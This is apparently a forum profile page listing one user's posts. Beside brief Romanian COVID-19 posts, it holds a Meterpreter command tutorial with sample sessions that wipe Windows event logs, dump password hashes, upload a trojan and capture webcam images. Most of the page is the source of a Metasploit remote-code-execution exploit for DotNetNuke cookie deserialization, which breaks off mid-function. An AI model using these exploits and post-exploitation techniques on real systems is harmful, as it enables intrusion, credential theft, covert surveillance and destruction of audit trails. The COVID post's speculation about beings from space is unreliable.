Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Kev

    COVID-19

    Posibil sa fie, eu cred ca ar fi altceva, nu in sange, stranut etc, Am biologie 10, chimie 10, calcule chimice, nu le-am mai facut de mult timp, am observaqt azi dimineata insecte pe care nu le-am vazut in viata mea intr-un catalog ce cred? au suparat Koreenii (ca tot fabrica rachete pe banda rulanta) pe cineva din spatiu, sau au adus pe cineva superior sa faca teste si au venit sa il caute cam asta ar fi opinia mea, in reststranuturi, tuse si aberatii d-astea sunt satul
  2. Kev

    COVID-19

    eu cand v-am spus voi Batman Batman https://www.secretulsanatatii.net/este-o-simpla-gripa-nu-o-boala-mortala-va-rog-reduceti-tonurile-declaratia-unui-medic-italian/
  3. -r, -R, --recursive remove directories and their contents recursively -f, --force ignore nonexistent files and arguments, never prompt
  4. Wallpaper
  5. USING METERPRETER COMMANDS Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. HELP The help command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again. meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter > CAT The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument. meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt What you talkin' about Willis meterpreter > CD AND PWD The cd and pwd commands are used to change and display current working directly on the target host. The change directory “cd” works the same way as it does under DOS and *nix systems. By default, the current working folder is where the connection to your listener was initiated. ARGUMENTS: cd: Path of the folder to change to pwd: None required Example usuage: meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments. Before using Meterpreter to clear the logs | Metasploit Unleashed Example usage: Before meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... meterpreter > After using Meterpreter to clear the logs | Metasploit Unleashed After DOWNLOAD The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter > EDIT The edit command opens a file located on the target host. It uses the ‘vim’ so all the editor’s commands are available. Example usage: meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt Please refer to the vim editor documentation for more advance use. http://www.vim.org/ EXECUTE The execute command runs a command on the target. meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> GETUID Running getuid will display the user that the Meterpreter server is running as on the host. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > HASHDUMP The hashdump post module will dump the contents of the SAM database. meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: meterpreter > IDLETIME Running idletime will display the number of seconds that the user at the remote machine has been idle. meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs meterpreter > IPCONFIG The ipconfig command displays the network interfaces and addresses on the remote machine. meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 meterpreter > LPWD AND LCD The lpwd and lcd commands are used to display and change the local working directory respectively. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console. Changing the working directory will give your Meterpreter session access to files located in this folder. ARGUMENTS: lpwd: None required lcd: Destination folder Example usage: meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www meterpreter > LS As in Linux, the ls command will list the files in the current remote directory. meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip... MIGRATE Using the migrate post module, you can migrate to another process on the victim. meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > PS The ps command displays a list of running processes on the target. meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... RESOURCE The resource command will execute Meterpreter instructions located inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine). meterpreter > resource Usage: resource path1 path2Run the commands stored in the supplied files. meterpreter > ARGUMENTS: path1: The location of the file containing the commands to run. Path2Run: The location where to run the commands found inside the file Example usage Our file used by resource: root@kali:~# cat resource.txt ls background root@kali:~# Running resource command: meterpreter> > resource resource.txt [*] Reading /root/resource.txt [*] Running ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2012-02-29 16:41:29 -0500 . 40777/rwxrwxrwx 0 dir 2012-02-02 12:24:40 -0500 .. 100666/rw-rw-rw- 606 fil 2012-02-15 17:37:48 -0500 IDA Pro Free.lnk 100777/rwxrwxrwx 681984 fil 2012-02-02 15:09:18 -0500 Sc303.exe 100666/rw-rw-rw- 608 fil 2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk 100666/rw-rw-rw- 522 fil 2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk [*] Running background [*] Backgrounding session 1... msf exploit(handler) > SEARCH The search commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for. meterpreter > search [-] You must specify a valid file glob to search for, e.g. >search -f *.doc ARGUMENTS: File pattern: May contain wildcards Search location: Optional, if none is given the whole system will be searched. Example usage: meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) meterpreter > SHELL The shell command will present you with a standard shell on the target system. meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> UPLOAD As with the download command, you need to use double-slashes with the upload command. meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe meterpreter > WEBCAM_LIST The webcam_list command when run from the Meterpreter shell, will display currently available web cams on the target host. Example usage: meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) meterpreter > WEBCAM_SNAP The webcam_snap’ command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. meterpreter > webcam_snap -h Usage: webcam_snap [options] Grab a frame from the specified webcam. OPTIONS: -h Help Banner -i The index of the webcam to use (Default: 1) -p The JPEG image path (Default: 'gnFjTnzi.jpeg') -q The JPEG image quality (Default: '50') -v Automatically view the JPEG image (Default: 'true') meterpreter > OPTIONS: -h: Displays the help information for the command -i opt: If more then 1 web cam is connected, use this option to select the device to capture the image from -p opt: Change path and filename of the image to be saved -q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality -v opt: By default the value is true, which opens the image after capture. Example usage: meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg meterpreter > Source
  6. This Metasploit module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 through 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data. This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/powershell' require 'openssl' require 'set' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer Rank = ExcellentRanking # ================================= # Overidden setup method to allow # for delayed handler start # ================================= def setup # Reset the session counts to zero. reset_session_counts return if !payload_instance return if !handler_enabled? # Configure the payload handler payload_instance.exploit_config = { 'active_timeout' => active_timeout } # payload handler is normally set up and started here # but has been removed so we can start the handler when needed. end def initialize(info = {}) super(update_info( info, 'Name' => "DotNetNuke Cookie Deserialization Remote Code Excecution", 'Description' => %q( This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML. The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data. This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system. ), 'License' => MSF_LICENSE, 'Author' => [ 'Jon Park', 'Jon Seigel' ], 'References' => [ [ 'CVE', '2017-9822' ], [ 'CVE', '2018-15811'], [ 'CVE', '2018-15812'], [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811 [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812 [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'], [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'], [ 'URL', 'https://github.com/pwntester/ysoserial.net'] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'auto' => true } ], [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ], [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ], [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ], [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { }, 'Privileged' => false, 'DisclosureDate' => "Jul 20 2017", 'DefaultOptions' => { 'WfsDelay' => 5 }, 'DefaultTarget' => 0 )) deregister_options('SRVHOST') register_options( [ OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']), OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]), OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']), OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie; (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]), OptString.new('KEY', [false, 'The key to use for encryption.', '']), OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']), OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server. DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']), OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email. Can also be the path to a file containing a list of verification codes.), '']) ] ) initialize_instance_variables end def initialize_instance_variables # ================== # COMMON VARIABLES # ================== @target_idx = 0 # Flag for whether or not to perform exploitation @dry_run = false # Flag for whether or not the target requires encryption @encrypted = false # Flag for whether or not to attempt to decrypt the provided verification token(s) @try_decrypt = false # ================== # PAYLOAD VARIABLES # ================== # ObjectStateFormatter serialized header @osf_header = [255, 1, 50] # ObjectStateFormatter serialized data before the command payload @osf_wrapper_start = [ 0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97, 114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115, 0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0, 2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11, 95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0, 17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0 ] # ObjectStateFormatter serialized data to place after the command payload. @osf_wrapper_end = [ 6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8, 68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7, 109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0, 0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 0, 0, 4, 116, 121, 112, 101, 8, 97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98, 108, 121, 14, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109, 101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83, 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11, 0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0, 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0, 0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108, 121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117, 114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101, 110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1, 1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91, 93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97, 114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101, 109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1, 16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0, 0, 0, 9, 22, 0, 0, 0, 10, 11 ] @cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/ # ================== # v9.1.1+ VARIABLES # ================== @key_charset = "02468ABDF" @verification_codes = [] @iv_regex = /[0-9A-F]{8}/ # Known plaintext @kpt = "" # Encryption objects @decryptor = OpenSSL::Cipher.new('des') @decryptor.decrypt @encryptor = OpenSSL::Cipher.new('des') @encryptor.encrypt # final passphrase (key +iv) to use for payload (v9.1.1+) @passphrase = "" # ================== # v9.2.0+ VARIABLES # ================== # Session token needed for exploitation (v9.2.0+) @session_token = "" # ================== # v9.2.2+ VARIABLES # ================== # User ID format (v9.2.2+) # Number of characters of user ID available in plaintext # is equal to the length of a GUID (no spaces or dashes) # minus (blocksize - known plaintext length). @user_id_pt_length = 32 - (8 - @kpt.length) @user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/ # Plaintext found from decryption (v9.2.2+) @found_pt = "" @iv_charset = "0123456789abcdef" # Possible IVs used to encrypt verification codes (v9.2.2+) @possible_ivs = Set.new([]) # Possible keys used to encrypt verification codes (v9.2.2+) @possible_keys = Set.new([]) # passphrases (key + iv) values to use for payload encryption (v9.2.2+) @passphrases = [] # char sets to use when generating possible base keys @unchanged = Set.new([65,70]) end def decode_verification(code) # Decode verification code base don DNN format return String.new( Rex::Text.decode_base64( code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=") ) ) end # ============== # Main function # ============== def exploit return unless check == Exploit::CheckCode::Appears @encrypted = datastore['ENCRYPTED'] verification_code = datastore['VERIFICATION_CODE'] if File.file?(verification_code) File.readlines(verification_code).each do |code| @verification_codes.push(decode_verification(code)) end else @verification_codes.push(decode_verification(verification_code)) end @kpt = datastore['VERIFICATION_PLAIN'] @session_token = datastore['SESSION_TOKEN'] @dry_run = datastore['DryRun'] key = datastore['KEY'] iv = datastore['IV'] if target['ReqEncrypt'] && @encrypted == false print_warning("Target requires encrypted payload. Exploit may not succeed.") end if @encrypted # Requires either supplied key and IV, or verification code and plaintext if (!key.blank? && !iv.blank?) @passphrase = key + iv # Key and IV were supplied, don't try and decrypt. @try_decrypt = false elsif (!@verification_codes.empty? && !@kpt.blank?) @try_decrypt = true else fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).") end end if target['ReqSession'] if @session_token.blank? fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.") end end if @encrypted && @try_decrypt # Set IV for decryption as the known plaintext, manually # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed. # For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time. # For v9.2.2+ it will find an initial base key faster than if padding were enabled. f8_plain 